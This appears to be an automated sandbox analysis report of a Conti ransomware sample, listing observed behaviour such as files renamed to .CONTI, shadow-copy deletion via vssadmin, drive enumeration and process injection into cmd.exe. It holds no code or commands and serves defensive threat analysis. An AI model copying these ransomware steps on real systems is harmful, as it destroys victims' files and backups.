Malware Analysis Report

2024-10-16 03:19

Sample ID 220306-eexctshhg6
Target 2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0
SHA256 2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0
Tags
conti ransomware
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0

Threat Level: Known bad

The file 2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0 was found to be: Known bad.

Malicious Activity Summary

conti ransomware

Conti Ransomware

Deletes shadow copies

Modifies extensions of user files

Drops desktop.ini file(s)

Enumerates connected drives

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Interacts with shadow copies

Runs net.exe

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2022-03-06 03:51

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2022-03-06 03:51

Reported

2022-03-06 03:54

Platform

win7-20220223-en

Max time kernel

4294177s

Max time network

119s

Command Line

"C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe"

Signatures

Conti Ransomware

ransomware conti

Deletes shadow copies

ransomware

Modifies extensions of user files

ransomware
Description Indicator Process Target
File renamed C:\Users\Admin\Pictures\ShowInvoke.png => C:\Users\Admin\Pictures\ShowInvoke.png.CONTI C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
File renamed C:\Users\Admin\Pictures\SetJoin.tif => C:\Users\Admin\Pictures\SetJoin.tif.CONTI C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
File renamed C:\Users\Admin\Pictures\StepMount.crw => C:\Users\Admin\Pictures\StepMount.crw.CONTI C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
File renamed C:\Users\Admin\Pictures\ResetStart.tif => C:\Users\Admin\Pictures\ResetStart.tif.CONTI C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\Users\Public\Documents\desktop.ini C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
File opened for modification C:\Users\Public\Music\Sample Music\desktop.ini C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
File opened for modification C:\Users\Public\Recorded TV\Sample Media\desktop.ini C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
File opened for modification C:\Users\Admin\Favorites\Links\desktop.ini C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
File opened for modification C:\Users\Admin\Favorites\desktop.ini C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
File opened for modification C:\Users\Admin\Music\desktop.ini C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
File opened for modification C:\Users\Public\desktop.ini C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
File opened for modification C:\Users\Public\Pictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
File opened for modification C:\Users\Public\Videos\desktop.ini C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
File opened for modification C:\Users\Admin\Downloads\desktop.ini C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
File opened for modification C:\Users\Admin\Links\desktop.ini C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
File opened for modification C:\Users\Admin\Videos\desktop.ini C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
File opened for modification C:\Users\Public\Desktop\desktop.ini C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
File opened for modification C:\Users\Public\Videos\Sample Videos\desktop.ini C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
File opened for modification C:\Users\Public\Recorded TV\desktop.ini C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
File opened for modification C:\Users\Admin\Documents\desktop.ini C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
File opened for modification C:\Users\Admin\Favorites\Links for United States\desktop.ini C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
File opened for modification C:\Users\Admin\Pictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
File opened for modification C:\Users\Admin\Saved Games\desktop.ini C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
File opened for modification C:\Users\Public\Libraries\desktop.ini C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
File opened for modification C:\Users\Public\Music\desktop.ini C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
File opened for modification C:\Users\Public\Pictures\Sample Pictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
File opened for modification C:\Users\Admin\Contacts\desktop.ini C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
File opened for modification C:\Users\Admin\Desktop\desktop.ini C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
File opened for modification C:\Users\Admin\Searches\desktop.ini C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
File opened for modification C:\Users\Public\Downloads\desktop.ini C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\e: C:\Windows\SysWOW64\vssadmin.exe N/A
File opened (read-only) \??\F: C:\Windows\SysWOW64\vssadmin.exe N/A
File opened (read-only) \??\f: C:\Windows\SysWOW64\vssadmin.exe N/A
File opened (read-only) \??\g: C:\Windows\SysWOW64\vssadmin.exe N/A
File opened (read-only) \??\G: C:\Windows\SysWOW64\vssadmin.exe N/A
File opened (read-only) \??\h: C:\Windows\SysWOW64\vssadmin.exe N/A
File opened (read-only) \??\D: C:\Windows\SysWOW64\vssadmin.exe N/A
File opened (read-only) \??\D: C:\Windows\SysWOW64\vssadmin.exe N/A
File opened (read-only) \??\E: C:\Windows\SysWOW64\vssadmin.exe N/A
File opened (read-only) \??\H: C:\Windows\SysWOW64\vssadmin.exe N/A
File opened (read-only) \??\h: C:\Windows\SysWOW64\vssadmin.exe N/A
File opened (read-only) \??\f: C:\Windows\SysWOW64\vssadmin.exe N/A
File opened (read-only) \??\g: C:\Windows\SysWOW64\vssadmin.exe N/A
File opened (read-only) \??\G: C:\Windows\SysWOW64\vssadmin.exe N/A
File opened (read-only) \??\H: C:\Windows\SysWOW64\vssadmin.exe N/A
File opened (read-only) \??\e: C:\Windows\SysWOW64\vssadmin.exe N/A
File opened (read-only) \??\E: C:\Windows\SysWOW64\vssadmin.exe N/A
File opened (read-only) \??\F: C:\Windows\SysWOW64\vssadmin.exe N/A

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1204 wrote to memory of 1448 N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe C:\Windows\SysWOW64\cmd.exe
PID 1204 wrote to memory of 1448 N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe C:\Windows\SysWOW64\cmd.exe
PID 1204 wrote to memory of 1448 N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe C:\Windows\SysWOW64\cmd.exe
PID 1204 wrote to memory of 1448 N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe C:\Windows\SysWOW64\cmd.exe
PID 1448 wrote to memory of 1676 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\vssadmin.exe
PID 1448 wrote to memory of 1676 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\vssadmin.exe
PID 1448 wrote to memory of 1676 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\vssadmin.exe
PID 1448 wrote to memory of 1676 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\vssadmin.exe
PID 1204 wrote to memory of 288 N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe C:\Windows\SysWOW64\cmd.exe
PID 1204 wrote to memory of 288 N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe C:\Windows\SysWOW64\cmd.exe
PID 1204 wrote to memory of 288 N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe C:\Windows\SysWOW64\cmd.exe
PID 1204 wrote to memory of 288 N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe C:\Windows\SysWOW64\cmd.exe
PID 288 wrote to memory of 1660 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\vssadmin.exe
PID 288 wrote to memory of 1660 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\vssadmin.exe
PID 288 wrote to memory of 1660 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\vssadmin.exe
PID 288 wrote to memory of 1660 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\vssadmin.exe
PID 1204 wrote to memory of 764 N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe C:\Windows\SysWOW64\cmd.exe
PID 1204 wrote to memory of 764 N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe C:\Windows\SysWOW64\cmd.exe
PID 1204 wrote to memory of 764 N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe C:\Windows\SysWOW64\cmd.exe
PID 1204 wrote to memory of 764 N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe C:\Windows\SysWOW64\cmd.exe
PID 764 wrote to memory of 1920 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\vssadmin.exe
PID 764 wrote to memory of 1920 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\vssadmin.exe
PID 764 wrote to memory of 1920 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\vssadmin.exe
PID 764 wrote to memory of 1920 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\vssadmin.exe
PID 1204 wrote to memory of 836 N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe C:\Windows\SysWOW64\cmd.exe
PID 1204 wrote to memory of 836 N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe C:\Windows\SysWOW64\cmd.exe
PID 1204 wrote to memory of 836 N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe C:\Windows\SysWOW64\cmd.exe
PID 1204 wrote to memory of 836 N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe C:\Windows\SysWOW64\cmd.exe
PID 836 wrote to memory of 1516 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\vssadmin.exe
PID 836 wrote to memory of 1516 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\vssadmin.exe
PID 836 wrote to memory of 1516 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\vssadmin.exe
PID 836 wrote to memory of 1516 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\vssadmin.exe
PID 1204 wrote to memory of 1816 N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe C:\Windows\SysWOW64\cmd.exe
PID 1204 wrote to memory of 1816 N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe C:\Windows\SysWOW64\cmd.exe
PID 1204 wrote to memory of 1816 N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe C:\Windows\SysWOW64\cmd.exe
PID 1204 wrote to memory of 1816 N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe C:\Windows\SysWOW64\cmd.exe
PID 1816 wrote to memory of 1004 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\vssadmin.exe
PID 1816 wrote to memory of 1004 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\vssadmin.exe
PID 1816 wrote to memory of 1004 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\vssadmin.exe
PID 1816 wrote to memory of 1004 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\vssadmin.exe
PID 1204 wrote to memory of 1796 N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe C:\Windows\SysWOW64\cmd.exe
PID 1204 wrote to memory of 1796 N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe C:\Windows\SysWOW64\cmd.exe
PID 1204 wrote to memory of 1796 N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe C:\Windows\SysWOW64\cmd.exe
PID 1204 wrote to memory of 1796 N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe C:\Windows\SysWOW64\cmd.exe
PID 1796 wrote to memory of 1224 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\vssadmin.exe
PID 1796 wrote to memory of 1224 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\vssadmin.exe
PID 1796 wrote to memory of 1224 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\vssadmin.exe
PID 1796 wrote to memory of 1224 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\vssadmin.exe
PID 1204 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe C:\Windows\SysWOW64\cmd.exe
PID 1204 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe C:\Windows\SysWOW64\cmd.exe
PID 1204 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe C:\Windows\SysWOW64\cmd.exe
PID 1204 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe C:\Windows\SysWOW64\cmd.exe
PID 1632 wrote to memory of 1076 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\vssadmin.exe
PID 1632 wrote to memory of 1076 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\vssadmin.exe
PID 1632 wrote to memory of 1076 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\vssadmin.exe
PID 1632 wrote to memory of 1076 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\vssadmin.exe
PID 1204 wrote to memory of 1708 N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe C:\Windows\SysWOW64\cmd.exe
PID 1204 wrote to memory of 1708 N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe C:\Windows\SysWOW64\cmd.exe
PID 1204 wrote to memory of 1708 N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe C:\Windows\SysWOW64\cmd.exe
PID 1204 wrote to memory of 1708 N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe C:\Windows\SysWOW64\cmd.exe
PID 1708 wrote to memory of 1988 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\vssadmin.exe
PID 1708 wrote to memory of 1988 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\vssadmin.exe
